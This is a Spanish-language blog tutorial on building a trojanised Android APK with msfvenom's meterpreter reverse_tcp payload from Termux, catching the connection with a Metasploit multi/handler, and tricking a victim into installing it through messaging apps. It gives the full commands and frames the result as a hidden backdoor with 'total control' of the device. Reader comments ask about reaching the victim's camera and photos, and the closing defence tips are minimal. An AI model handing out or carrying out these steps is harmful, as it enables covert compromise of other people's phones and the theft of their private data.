Como hackear android con Metasploit


Creando apk malicioso con payload meterpreter desde Termux.

Hola hoy les quiero enseñar una técnica de hacking vastante antigua entre nosotros pero que sin duda aún es funcional y efectiva para "hackear" dispositivos Android. Bien dicho todo esto vamos a comenzar con el proceso.

Necesitamos para este tutorial: 

Metasploit instalado en nuestro termux, les dejo el tutorial de instalación:

1- Metasploit instalado

2- Termux descargado desde F-droid 

Creando la carga útil con msfvenom.

Para comenzar vamos a crear una carga útil que nos servirá para adquirir la sesión meterpreter desde el celular de la víctima, para ello se emplea una conexión reversa; es decir la víctima es quien realiza la conexión hacia nosotros hacia nuestro puerto de escucha. 

Bien configuramos los parámetros de msfvenom.

ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.16 LPORT=4546 R > /sdcard/download/prueba.apk


¿Te vas a preguntar que estamos haciendo aquí?

Lo voy a explicar, calma.

1) msfvenom: es el que nos va a crear un archivo con extensión .apk, es él que debemos de hacer que la víctima instale en su dispositivo. 

2) -p: Este es un parámetros que msfvenom usa para saber que le estamos que realize un payload.

3) android/meterpreter/reverse_tcp: Esta línea es el payload o el modo de conexión que vamos a emplear con éste  "troyano", en este caso es una conexión reversa, desde él dispositivo víctima hacía nosotros. 

4) LHOST=: Este es otro parámetro que le indica a msfvenom el host que va a esperar la conexión, aquí ponemos nuestra ip si va a ser dentro de la misma red, hablaremos de la versión fuera de red en otro post. Entonces ponemos la ip de nuestra maquina Ejemplo: LHOST=192.168.0.13

5) LPORT=: Al igual que el parámetro Lhost, este le indica el puerto donde se estará esperando por una conexión entrante.

6) R > : Con esto podemos indicarle el nombre y la ruta donde se va a almacenar el archivo una vez se haya creado. En este caso se va a guardar en la carpeta de descargas(download) con el nombre "pruba.apk" es importante colocar la extensión para que todo funcione bien.



Cómo podemos apreciar en la imagen de arriba, nuestro (troyano) se a creado de forma correcta se almacena en /sdcard/dowload/prueba.apk, podemos irnos a esa ruta desde la terminal o con un explorador de archovo de nuestra preferencia, yo usaré Es file Explorer.



Podemos ver que la aplicación ya está en la ruta que le habíamos indicado, ahora debemos de improvisar algún modo para conseguir que nuestra víctima lo instalé, podemos usar: WhatsApp, Telegram etc, eso ya lo dejo como tarea porque hagan volar su imaginación de hacker. Pero antes de enviarlo de hacer algo más..


Muy bien, vamos a usar la consola que metaploit trae para poder recibir la conexión que obtendremos cuando la víctima haga click sobre nuestro apk. 

Vamos a usar para éste propósito una utilidad de metasploit llamada Msfconsole, que es la consola de metasploit que nos hará la vida más fácil, bien vamos a ello..

En otra ventana de termux vamos a inciar la consola, para ello usamos el comando: msfconsole o ./msfcosole, prueba uno de los dos te van a servir cualquiera.


Msfconsole suele tardar algunos minutos para que arranque, pero vamos a esperar no tardara demasiado.

Cuando terminé el arranque veremos algo como esto:

Éste es el inicio que veremos cada vez que llamamos a Msfconsole 

Consola de metasploit. 

Vamos a comenzar con setear el exploit que vamos a usar:

use exploit/multi/handler y pulsamos a enter


Vemos en la imagen que se nos pone en rojo, esto nos indica que ya estamos dentro de el exploit, aquí vamos a tener que configurar alguna cosas para que todo funcione, podemos ver las opciones disponibles a configurar con el comando show opciones.


En la imagen podemos ver luego de introducir show options los parámetros que nos pide 3 cosas importantes:

1) el payload a usar, en este caso será el mismo que usamos para crea el apk maliciosos, para configurar vamos  a poner lo siguiente:

set PAYLOAD android/meterpreter/reverse_tcp

2) LHOST: aquí podremos el miedo ip que usamos para la apk, en mi caso es este: 192.168.0.30

3) LPORT: en este caso también podemos usar el mismo, ya que lo vamos a usar dentro de la misma red, esto quiere decir que el dispositivo víctima tiene que estar conectado a nuestra misma red wifi, usaré el puerto: 4546.

Nos tiene que quedar de esta manera, si todo está correcto vamos a inciar la escucha por conexiones de nuestra apk...

Para ello vamos a escribir el siguiente comando: run y de inmediato se inciará la escucha.

Ahora vamos a instalar el apk en el dispositivo víctima y vamos a ejecutarlo para ver lo que pasa.


Cuando le damos a abrir parecerá que la app no funciona y se cerrará, esto es lo que la víctima verá, pero desde nuestro lado ocurre la verdadera magia:


Logramos acceder al dispositivo y tener control total sobre el, podemos hacer varias cosas, pero ya ustedes van a dejar volar su imaginación para sus propósitos y pruebas.

Para ver los comandos disponibles escribimos help..


Las posibilidades y opciones que tenemos son muchas y si quieren saber más afondo si recibo mucho apoyo les voy a enseñar mucho más afondo el uso y sus diferentes opciones de este "backdoor" es importante que tenga en cuenta que cuando la víctima reincie el dispositivo perderemos la conexión.. 

Bien hemos visto lo fácil que es hacer un backdoor para tomar control sobre un dispositivo Android sin siquiera tener mucho conocimiento, con unos pocos comandos hemos logrado hacer esto.


Como protegerse de estos ataques: 

  • No instalar Apps de fuentes desconocidas y personas poco fiables.
  • Prestar atención a los permisos pedidos por la aplicación al momento de la instalación.
Esos son los principales y más importantes puntos a tener en cuenta al instalar Apps desconocidas para evitar estos tipos de ataques.

Esperó que les haya gustado, si veo que tengo mucho apoyo seguiré subiendo más sobre esta misma técnica, hacerlo persistente y sacarlo fuera de la red... 

Déjenme saberlo en los comentarios si les  funcionó, si tienen alguna duda solo comentenlo en el video de metasploit o por aquí...

Quiero seguir creciendo y así traerle mejores contenidos, gratis...

Déjenme saber en los comentarios si quieren la segunda parte, saludos.

Comentarios

  1. Respuestas
    1. Antes de correr primero debemos de caminar. Por esa razón primero lo hago dentro de la misma red. Para que de ese modo puedan perfeccionar y saber las posibilidades que tiene.

      Luego de que ya sepan lo básico ya podemos correr.

      El siguiente será fuera de la red local.

      Es para quienes aún no tienen conocimiento sobre metasploit y el meterpreter.

      Borrar
  2. Hola, me gusta el contenido apenas estoy iniciando

    ResponderBorrar
  3. Hola me gusta el aporte que hiciste la verdad lo pondré aprueba, pero tengo dudas como seria hacerlo fuera de la red ??

    ResponderBorrar
  4. Este comentario ha sido eliminado por el autor.

    ResponderBorrar
  5. Recién encontré tu post lo voy a probar por la noche, también se podrían ver las fotos de la galería 🤔

    ResponderBorrar
  6. Ya tengo matasploit y ni sabia como se usaba lo voy a probar, puedo acceder a la cámara y fotos

    ResponderBorrar

Publicar un comentario

Entradas más populares de este blog

Cómo instalar metasploit en termux sin errores

Cómo instalar hydra en termux 2024